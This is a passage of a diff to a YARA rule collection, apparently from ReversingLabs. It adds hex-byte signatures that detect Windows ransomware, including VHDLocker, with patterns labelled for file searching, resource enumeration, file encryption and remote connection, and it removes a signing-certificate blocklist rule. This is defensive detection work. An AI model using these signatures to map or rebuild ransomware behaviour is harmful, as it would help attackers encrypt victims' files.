+            ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 83 EC ?? 8D 45 ?? 8B F4 50 E8 ?? ??
+            ?? ?? 83 EC ?? 8B F4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 33
+            FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$enum_resources_p1 = {
+            55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 53 56 57 FF 15 ?? ?? ??
+            ?? 83 64 24 ?? ?? 89 44 24 ?? BB ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? D3 EA 33 C0 40
+            23 D0 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? 80 C1 ?? 5F 88 4C 24 ?? FF 74 24 ?? 8D
+            74 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 64 24 ?? ?? 8B 74 24 ?? 53 89
+            7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 59 03 C6 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D
+            44 24 ?? 50 83 C8 ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8B C6
+            E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8B C6 50 FF 15 ?? ?? ?? ?? 6A ?? 33
+            FF 8D 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59
+            8B F8 53 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
+            33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53
+            8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+        }
+		$enum_resources_p2 = {
+            8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D
+            74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8D 44 24
+            ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ??
+            E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 ?? 6A ?? 8D 4C 24 ?? 51 8D
+            4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ?? 89 44 24 ?? 8D
+            44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ??
+            89 44 24 ?? 8D 44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 2B 44 24
+            ?? 8B 4C 24 ?? 1B 4C 24 ?? BE ?? ?? ?? ?? 0F AC C8 ?? 89 44 24 ?? 8D 44 24 ?? C1 E9
+            ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? FF 44 24 ?? 83 7C 24 ?? ??
+            0F 8C ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files_1_p1 = {
+            6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0
+            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ??
+            E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ??
+            59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ??
+            ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84
+        }
+		$find_files_1_p2 = {
+            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ??
+            ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ??
+            ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ??
+            ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ??
+            ?? ?? 59 84 C0 75 ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ??
+            FF 15
+        }
+		$find_files_2_p1 = {
+            8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F
+            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ??
+            ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 8D
+            84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
+        }
+		$find_files_2_p2 = {
+            50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ??
+            ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 4C
+            24 ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ??
+            ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 75 ?? 32 DB EB ?? B3 ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33
+            FF 8D 74 24 ?? E8 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33 FF 8D 74
+        }
+		$find_files_2_p3 = {
+            24 ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ??
+            ?? ?? 50 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 8B
+            46 ?? 59 83 C9 ?? 2B C8 83 F9 ?? 0F 86 ?? ?? ?? ?? 8D 58 ?? 6A ?? 8B C6 E8 ?? ?? ??
+            ?? 84 C0 74 ?? 83 7E ?? ?? 8B 4E ?? 72 ?? 8B 06 EB ?? 8B C6 6A ?? 5A 66 89 14 48 83
+            7E ?? ?? 89 5E ?? 72 ?? 8B 06 EB ?? 8B C6 33 C9 66 89 0C 58 8B DE 8D 74 24 ?? E8 ??
+            ?? ?? ?? 8B DE 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF E8 ?? ?? ?? ?? 6A ?? 8D 74 24
+            ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44
+            24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 44 24 ?? E8
+            ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 59 6A ?? 33 FF 8D 74 24 ?? E8
+            ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9 8D 74 24 ?? E8 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ??
+            ?? ?? 59 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9
+            8D 74 24 ?? E8
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 33 F6 C7 43 ??
+            ?? ?? ?? ?? 89 73 ?? C6 03 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 57 2B C1 6A ?? 99 5F
+            F7 FF 89 9D ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 85 C0 74 ?? 89 B5 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 83 EC ?? 03 C1 8B F4 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 50 83 C8 ?? 8B F3 E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 8B 0D ?? ?? ?? ?? 2B C1 6A ?? 99 5E F7 FE FF 85 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ??
+            39 85 ?? ?? ?? ?? 72 ?? 8B 53 ?? 6A ?? 5F C6 85 ?? ?? ?? ?? ?? 3B D7 72 ?? 8B 0B EB
+            ?? 8B CB 8B 43 ?? 03 C1 3B D7 72 ?? 8B 0B EB ?? 8B CB 50 51 8D 85 ?? ?? ?? ?? 50 8D
+            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 7B ?? 72 ?? 8B 03 EB ?? 8B C3 8B 5B ?? 8B
+            B5 ?? ?? ?? ?? 03 D8 53 FF B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B
+            4E ?? C6 85 ?? ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ??
+            8B 0E EB ?? 8B CE 50 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 39 7E ?? 72 ?? 8B 0E EB ?? 8B CE 8B 46 ?? 03 C1 50 FF B5 ?? ?? ?? ?? 8D 9D ?? ??
+            ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4E
+        }
+		$encrypt_files_p2 = {
+            89 85 ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ?? 8B 0E EB
+            ?? 8B CE 3B C8 74 ?? 8B B5 ?? ?? ?? ?? 2B F1 8A 11 88 14 0E 41 3B C8 75 ?? 8D 45 ??
+            50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 75 ?? 8B F8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 8D 45 ?? E8 ?? ?? ?? ?? 8B F0 8B 46 ?? 8B 56 ?? 59 59 8B 4F ?? 2B C2 3B C8 76 ??
+            8B 47 ?? 2B C1 3B C2 72 ?? 56 8B F7 E8 ?? ?? ?? ?? EB ?? 6A ?? 57 83 C8 ?? E8 ?? ??
+            ?? ?? 8B D8 8D 75 ?? E8 ?? ?? ?? ?? 8B C6 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 DB 53 68 ?? ?? ?? ?? 6A ?? 53 53 68 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8
+            ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 3B F3 74 ?? 53 53 53 56
+            FF 15 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF
+            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 59 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMRAN IT SERVICES LTD" and ( pe.signatures [ i ] . serial == "00:fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da" or pe.signatures [ i ] . serial == "fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da" ) and 1548028800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_1_p* ) ) and ( all of ( $find_files_2_p* ) ) and ( all of ( $enum_resources_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Ebbdd6Cdeda40Ca64513280Ecd625C54 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Vhdlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects VHDLocker ransomware."
 		author = "ReversingLabs"
-		id = "2cf769dc-5108-5f18-a51e-e152180a2b66"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "696f8145-342b-5da5-b9ec-6f0d16afc465"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3120-L3138"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.VHDLocker.yara#L1-L152"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1d419f2fe2a9bf744bdde48adc50e0bc48746f1576f96570385a2a1c9ba92d21"
+		logic_hash = "39d1fbfc79d5ea866498bb1e40d2290469df774ce65b1da04a85c0e4e5b4493c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "VHDLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 50 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            33 DB 8D 95 ?? ?? ?? ?? 53 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ??
+            ?? ?? 89 9D ?? ?? ?? ?? 33 F6 8B FF 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ?? 46 83 FE ??
+            7C ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D
+            B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 8D
+        }
+		$encrypt_files_p2 = {
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 57 FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 35 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50 57 FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? 52 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D 95 ?? ?? ??
+            ?? 52 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 81 BD ??
+            ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ??
+            ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 11 9D ?? ?? ?? ??
+            83 FA ?? 0F 84 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9
+        }
+		$encrypt_files_p3 = {
+            75 ?? 2B C2 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51 8D 14 00 A1 ?? ?? ?? ?? 52 53 50 FF D6
+            8B 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 52 FF D6 8B 15 ??
+            ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? 51 52 FF D6 8B 0D ?? ?? ?? ?? 6A
+            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 51 FF D6 8B 0D ?? ?? ?? ?? 6A ?? 8D 95
+            ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 51 FF D6 EB ?? 8B 9D ?? ?? ?? ?? 6A ?? 33
+            C9 51 51 B8 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 DB EB ?? 83 85 ?? ??
+            ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55
+            ?? 8B B5 ?? ?? ?? ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 8D 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 52 FF 15 ?? ?? ?? ?? 33 C9
+            51 51 33 C0 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 FF 15 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64
+            89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 68 ?? ?? ?? ?? 33 F6
+            8D 8D ?? ?? ?? ?? 33 C0 56 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8D 95
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ??
+            52 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B
+            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 57 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ??
+            66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83
+        }
+		$find_files_p2 = {
+            D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
+            ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33
+            C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 BB ?? ?? ?? ??
